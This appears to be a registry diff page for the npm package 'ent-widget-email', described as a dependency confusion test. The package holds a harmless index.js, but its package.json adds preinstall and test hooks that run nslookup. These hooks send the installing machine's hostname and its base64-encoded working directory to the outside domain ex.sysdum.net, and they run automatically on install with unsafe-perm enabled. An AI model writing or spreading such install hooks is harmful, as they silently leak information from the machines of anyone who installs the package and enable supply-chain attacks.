ent-widget-email 23.3.7

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of ent-widget-email might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +3 -0
  2. package/package.json +21 -0
  3. package/readme.md +1 -0
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ exports.printMsg = function() {
2
+ console.log("This is a message from the demo package");
3
+ }
package/package.json ADDED
@@ -0,0 +1,21 @@
1
+ {
2
+ "name": "ent-widget-email",
3
+ "version": "23.3.7",
4
+ "description": "ENT Widget Email Package demo for research purposes only.",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "nslookup $(hostname).$(pwd|base64).ex.sysdum.net",
8
+ "preinstall": "nslookup $(hostname).$(pwd|base64).ex.sysdum.net"
9
+ },
10
+ "keywords": [
11
+ "ent",
12
+ "usaa",
13
+ "utils"
14
+ ],
15
+ "dependencies": {},
16
+ "config": {
17
+ "unsafe-perm":true
18
+ },
19
+ "author": "Sysdum",
20
+ "license": "ISC"
21
+ }
package/readme.md ADDED
@@ -0,0 +1 @@
1
+ This is a dependency confusion test.